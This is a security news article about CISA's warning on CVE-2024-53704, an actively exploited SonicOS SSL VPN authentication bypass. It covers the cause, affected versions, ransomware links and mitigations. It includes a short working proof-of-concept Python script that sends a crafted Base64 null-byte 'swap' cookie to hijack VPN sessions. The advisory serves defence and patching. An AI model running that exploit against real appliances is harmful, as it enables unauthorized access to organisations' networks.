CISA Warns of SonicWall SonicOS RCE Vulnerability Actively Exploited in the Wild

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has escalated warnings about a critical zero-day vulnerability in SonicWall’s SonicOS, designating CVE-2024-53704 for immediate remediation in its Known Exploited Vulnerabilities (KEV) catalog.

This improper authentication flaw, which enables remote attackers to hijack active SSL VPN sessions without credentials, has been confirmed as actively exploited in the wild.

Federal agencies must patch affected systems by March 11, 2025, under Binding Operational Directive (BOD) 22-01. The vulnerability’s exploitation underscores persistent risks in widely deployed network security appliances and highlights the tactical evolution of threat actors targeting authentication bypass mechanisms.

Technical Analysis of CVE-2024-53704

The vulnerability resides in SonicOS’s SSL VPN authentication mechanism, specifically within the getSslvpnSessionFromCookie function. This function mishandles Base64-encoded session cookies, allowing attackers to bypass authentication by crafting malicious payloads.

The flawed processing of null characters in decoded cookies enables session hijacking, granting unauthorized access to VPN tunnels.

Researchers at BishopFox demonstrated that encoding 32 null bytes into a Base64 string and injecting it via the swap cookie grants full control over active sessions8. A proof-of-concept Python script reveals the simplicity of the exploit:

pythonimport base64, requests, urllib3, warnings
warnings.filterwarnings("ignore", category=urllib3.exceptions.InsecureRequestWarning)
payload = base64.b64encode(b"x00" * 32).decode()
resp = requests.get(
    "https://192.168.50.189:4433/cgi-bin/sslvpnclient?launchplatform=",
    cookies={"swap": payload},
    verify=False
)
print(resp.headers)
print(resp.text)

This script generates a malformed cookie that triggers the authentication bypass, enabling attackers to hijack sessions without credentials8. The exploit’s low complexity and lack of required privileges contribute to its CVSSv3 score of 9.8, reflecting critical severity.

Affected Products and Patch Status

CVE-2024-53704 impacts multiple SonicOS versions, including:

• SonicOS 7.1.x (versions up to 7.1.1-7058)
• SonicOS 7.1.2-7019
• SonicOS 8.0.0-8035

SonicWall has released updated firmware to address the flaw, urging immediate upgrades for all Gen5–Gen7 firewalls. Organizations unable to patch immediately should restrict SSL VPN access to trusted IPs, disable internet-facing management interfaces, and enforce multi-factor authentication (MFA) for all VPN users.

While CISA’s KEV entry does not explicitly confirm ransomware involvement, historical patterns suggest plausible connections.

In September 2024, CVE-2024-40766 another critical SonicOS flaw was exploited by Akira ransomware affiliates to compromise SSLVPN accounts lacking MFA and centralized authentication.

Arctic Wolf observed identical tactics in CVE-2024-53704 exploitation: locally managed accounts, disabled MFA, and outdated firmware. Rapid7 further noted circumstantial evidence linking SonicWall SSLVPN breaches to ransomware initial access. These parallels indicate that threat actors systematically target SonicWall vulnerabilities, leveraging authentication gaps to deploy ransomware payloads.

Federal and Enterprise Risk Exposure

With over 500,000 global customers, including government agencies, SonicWall’s widespread adoption amplifies CVE-2024-53704’s risk profile. Federal agencies now face a March 11 deadline to remediate the vulnerability, per CISA’s directive.

Private sector entities, particularly in healthcare, finance, and critical infrastructure, must also prioritize patching to avoid operational disruption.

The exploit’s ability to bypass authentication undetected complicates incident response, as attackers gain persistent access without triggering traditional intrusion alerts.

Mitigation Strategies and Best Practices

1. Apply Vendor Patches: Upgrade to SonicOS versions beyond 7.1.1-7058, 7.1.2-7019, and 8.0.0-8035.
2. Enforce MFA: Implement time-based one-time passwords (TOTP) or email OTPs for all SSLVPN users, eliminating reliance on single-factor authentication.
3. Network Segmentation: Restrict SSL VPN and management console access to predefined IP ranges, minimizing exposure to untrusted networks.
4. Password Policies: Reset credentials for locally managed SSLVPN accounts and integrate with centralized directories like Active Directory to reduce credential theft risks7.

Organizations should adopt continuous vulnerability management frameworks, aligning patch cycles with CISA KEV updates. Proactive monitoring for anomalous VPN logins—such as off-hours access or geographic irregularities can detect exploitation attempts. Additionally, migrating from SSL VPNs to zero-trust network access (ZTNA) models reduces reliance on perimeter-based security, limiting attack surfaces.

Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here

Also Read:

CISA Warns of Apple iOS Vulnerability Exploited in Wild

The post CISA Warns of SonicWall SonicOS RCE Vulnerability Actively Exploited in the Wild appeared first on Cyber Security News.